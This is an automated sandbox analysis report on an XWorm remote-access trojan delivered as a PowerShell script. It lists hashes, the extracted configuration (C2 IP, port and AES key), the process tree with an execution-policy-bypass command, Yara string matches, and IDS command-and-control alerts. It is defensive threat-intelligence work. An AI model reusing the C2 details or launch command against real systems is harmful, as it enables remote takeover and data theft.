Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
176.113.115.170.ps1

Overview

General Information

Sample name:176.113.115.170.ps1
Analysis ID:1589116
MD5:be3bf7a258359bd7c14c47b3872c9531
SHA1:be71f346690b8f384961bf73b382181c5959aef6
SHA256:ef9aeef4f3b7ea00add3168043c866716d72353065d95b7b7dd981641d91f1ae
Tags:176-113-115-170bookingdafeytv-1985-nzxps1sputnik-1985-comuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5916 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["176.113.115.170"], "Port": 4413, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xd8a8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xd945:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xda5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xd5ca:$cnc4: POST / HTTP/1.1
    00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x1e5d88:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1e5e25:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1e5f3a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x1e5aaa:$cnc4: POST / HTTP/1.1
      00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          4.2.RegSvcs.exe.400000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0xb59a:$str01: $VB$Local_Port
          • 0xb5be:$str02: $VB$Local_Host
          • 0x975c:$str03: get_Jpeg
          • 0x9edd:$str04: get_ServicePack
          • 0xc5fa:$str05: Select * from AntivirusProduct
          • 0xcf30:$str06: PCRestart
          • 0xcf44:$str07: shutdown.exe /f /r /t 0
          • 0xcff6:$str08: StopReport
          • 0xcfcc:$str09: StopDDos
          • 0xd0c2:$str10: sendPlugin
          • 0xd142:$str11: OfflineKeylogger Not Enabled
          • 0xd29a:$str12: -ExecutionPolicy Bypass -File "
          • 0xd8af:$str13: Content-length: 5235
          0.2.powershell.exe.272c85102e0.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            4.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xdaa8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xdb45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xdc5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xd7ca:$cnc4: POST / HTTP/1.1
            0.2.powershell.exe.272c85102e0.1.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x979a:$str01: $VB$Local_Port
            • 0x97be:$str02: $VB$Local_Host
            • 0x795c:$str03: get_Jpeg
            • 0x80dd:$str04: get_ServicePack
            • 0xa7fa:$str05: Select * from AntivirusProduct
            • 0xb130:$str06: PCRestart
            • 0xb144:$str07: shutdown.exe /f /r /t 0
            • 0xb1f6:$str08: StopReport
            • 0xb1cc:$str09: StopDDos
            • 0xb2c2:$str10: sendPlugin
            • 0xb342:$str11: OfflineKeylogger Not Enabled
            • 0xb49a:$str12: -ExecutionPolicy Bypass -File "
            • 0xbaaf:$str13: Content-length: 5235
            Click to see the 10 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", ProcessId: 6212, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", ProcessId: 6212, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T10:03:15.710239+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:03:23.819884+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:03:37.285229+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:03:45.707942+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:03:50.755229+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:04.223272+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:15.728135+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:17.693170+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:19.363812+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:19.485113+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:30.848378+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:39.832693+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:45.348369+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:45.732510+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:47.586686+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:49.945635+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:50.075448+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:50.196498+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:04:55.313184+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:01.272151+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:01.395541+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:07.723496+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:15.747681+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:21.197542+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:24.708086+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:28.051668+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:33.464028+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:34.149677+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:45.767809+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:47.613889+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:05:55.274630+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:06.379585+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:15.784852+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:19.851542+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:33.347246+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:43.801919+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:45.797759+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:47.383427+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:47.554173+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:47.846791+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:48.222026+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:51.492933+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:52.317426+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:53.489179+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:53.609907+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:06:55.380815+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:07:00.584845+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:07:04.006405+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:07:04.133440+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:07:04.250902+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:07:04.831267+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            2025-01-11T10:07:10.590896+010028528701Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T10:03:23.833659+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:03:37.287933+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:03:50.757217+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:04.226679+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:17.694906+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:19.367649+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:19.487034+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:30.855002+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:39.835523+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:45.351079+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:47.588963+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:49.949996+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:50.089397+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:50.203852+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:04:55.315587+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:05:01.274287+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:05:01.397754+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:05:07.725209+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:05:21.199697+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:05:24.710811+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:05:28.064303+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:05:33.465784+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:05:34.154960+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:05:47.615192+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:05:55.404050+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:06.384569+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:19.852832+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:33.411931+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:43.803194+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:47.385515+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:47.555629+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:47.848083+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:48.227167+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:51.610033+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:52.319100+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:53.490802+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:53.611322+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:06:55.382570+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:07:00.587025+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:07:04.007680+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:07:04.134457+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:07:04.255218+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:07:04.375196+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:07:04.383325+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:07:04.833348+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            2025-01-11T10:07:10.591417+010028529231Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T10:03:15.710239+010028588011Malware Command and Control Activity Detected176.113.115.1704413192.168.2.649718TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T10:06:33.133470+010028587991Malware Command and Control Activity Detected192.168.2.649718176.113.115.1704413TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpackMalware Configuration Extractor: Xworm {"C2 url": ["176.113.115.170"], "Port": 4413, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Multi AV Scanner detection for submitted file
            Source: 176.113.115.170.ps1Virustotal: Detection: 9%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Sample uses string decryption to hide its real strings
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpackString decryptor: 176.113.115.170
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpackString decryptor: 4413
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpackString decryptor: P0WER
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpackString decryptor: <Xwormmm>
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpackString decryptor: XWorm
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpackString decryptor: USB.exe
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2207246498.00000272E0650000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.170:4413 -> 192.168.2.6:49718
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 176.113.115.170:4413 -> 192.168.2.6:49718
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49718 -> 176.113.115.170:4413
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49718 -> 176.113.115.170:4413
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49718 -> 176.113.115.170:4413
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 176.113.115.170
            Source: global trafficTCP traffic: 192.168.2.6:49718 -> 176.113.115.170:4413
            Source: global trafficTCP traffic: 192.168.2.6:57846 -> 162.159.36.2:53
            Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
            Source: unknownDNS traffic detected: query: 18.31.95.13.in-addr.arpa replaycode: Name error (3)
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
            Source: powershell.exe, 00000000.00000002.2176808391.00000272C94E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.2176808391.00000272C8111000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000000.00000002.2176808391.00000272C8111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.2176808391.00000272C94E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
